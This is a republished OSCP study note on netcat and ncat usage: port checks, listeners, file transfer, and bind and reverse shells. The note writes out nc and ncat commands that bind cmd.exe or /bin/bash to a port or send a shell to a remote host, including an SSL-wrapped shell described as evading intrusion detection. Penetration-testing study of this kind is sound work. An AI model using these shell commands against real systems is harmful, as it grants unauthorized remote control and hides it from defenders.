OSCP Note - Common use of Netcat(nc) and Ncat

admin 2024年8月14日14:40:18评论7 views字数 4408阅读14分41秒阅读模式

0x00 TL;DR

The article records some ways to use nc.

  • Determine if the target port is open
  • Connecting to a TCP/UDP Port
  • Listening on a TCP/UDP Port
  • Transferring Files with Netcat
  • Remote Administration with Netcat
  • Ncat:more security’s nc

0x01 Determine if the target port is open

  • Port open
1234
[ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 22Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 10.0.0.64:22.Ncat: 0 bytes sent, 0 bytes received in 0.53 seconds.
  • Port close
1234
[ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 23Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connection refused.[ec2-user@ip-10-0-0-64 ~]$

0x02 Connecting to a TCP/UDP Port

Useful:

  • check port is open or closed
  • read a banner
  • To connect to a network service manually

example:

12345678910
[ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 22Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 10.0.0.64:22.SSH-2.0-OpenSSH_7.4Protocol mismatch.Ncat: Broken pipe.[ec2-user@ip-10-0-0-64 ~]$

0x03 Listening on a TCP/UDP Port

Useful:

  • network debugging client applications
  • otherwise receiving a TCP/UDP network connection

Server side listen TCP port 4444:

1234
[ec2-user@ip-10-0-0-64 ~]$ nc -nvlp 4444Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Listening on :::4444Ncat: Listening on 0.0.0.0:4444

Use netstat can see TCP port 4444 is open.

1234
[ec2-user@ip-10-0-0-64 ~]$ sudo netstat -nltp | grep 4444tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      7427/nctcp6       0      0 :::4444                 :::*                    LISTEN      7427/nc[ec2-user@ip-10-0-0-64 ~]$

Clienr side can connect this TCP port and chat with server side.

12345
[ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 4444Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 10.0.0.64:4444.aaaaaaaaaaaaaaaaaaaaa

0x04 Transferring Files with Netcat

Note the Windows Firewall configuration.Text and binary file all support.

Server side(Target machine):

123
D:\netcat-win32-1.12>nc64.exe -nlvp 4444 > wget.exelistening on [any] 4444 ...connect to [10.0.0.39] from (UNKNOWN) [52.80.67.xxx] 59980

Client side:

1234
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 < wget.exeNcat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 54.222.196.xxx:4444.Ncat: 308736 bytes sent, 0 bytes received in 0.62 seconds.

0x05 Remote Administration with Netcat

Netcat can take an executable file and redirect the input(stdin), output(stdout), and error messages(stderr) to a TCP/UDP port rather than the default console.

nc Bind Shell

Service side(Windows):

123
D:\netcat-win32-1.12>nc -nlvp 4444 -e cmd.exelistening on [any] 4444 ...connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 60420

Linux can use this command bind shell:

1
nc -nlvp 4444 -e /bin/bash

client side:

1234567891011
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 54.222.196.xxx:4444.Microsoft Windows [▒汾 10.0.14393](c) 2016 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒D:\netcat-win32-1.12>whoamiwhoamiec2amaz-okar8bt\administratorD:\netcat-win32-1.12>

nc Reverse Shell

Service side:

12
D:\netcat-win32-1.12>nc -nlvp 4444listening on [any] 4444 ...

Client side:

123
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 -e /bin/bashNcat: Version 7.50 ( https://nmap.org/ncat )Ncat: Connected to 54.222.196.xxx:4444.

Then you can execute command in this reverse shell, like this:

12345
D:\netcat-win32-1.12>nc -nlvp 4444listening on [any] 4444 ...connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 40908iduid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)

0x06 Ncat:more security’s nc

  • Encryption of the bind or reverse shell will aid the penetration tester in avoiding intrusion detection systems
  • Not expose the penetrated machines to unwanted IP addresses.

Server side:

12345678
[ec2-user@ip-10-0-0-64 temp]$ ncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --sslNcat: Version 7.50 ( https://nmap.org/ncat )Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3Ncat: Listening on :::4444Ncat: Listening on 0.0.0.0:4444Ncat: Connection from 54.222.196.xxx.Ncat: Connection from 54.222.196.xxx:63540.

Client side:

123456
D:\NcatPortable-master\NcatPortable-master>ncat -v 52.80.67.xxx 4444 --sslNcat: Version 5.59BETA1 ( http://nmap.org/ncat )Ncat: SSL connection to 52.80.67.xxx:4444.Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3iduid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)

Then you can execute command in this bind shell.

0x07 Command summary

12345678910
nc -vz 10.0.0.64 22nc -nv 10.0.0.64 22nc -nvlp 4444nc64.exe -nlvp 4444 > wget.exenc -nv 54.222.196.xxx 4444 < wget.exenc -nlvp 4444 -e cmd.exenc -nlvp 4444 -e /bin/bashnc -nv 54.222.196.xxx 4444 -e /bin/bashncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --sslncat -v 52.80.67.xxx 4444 --ssl

0x08 Reference

- source:tonghuaroot.com

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月14日14:40:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP Note - Common use of Netcat(nc) and Ncathttp://cn-sec.com/archives/3067258.html

发表评论

匿名网友 填写信息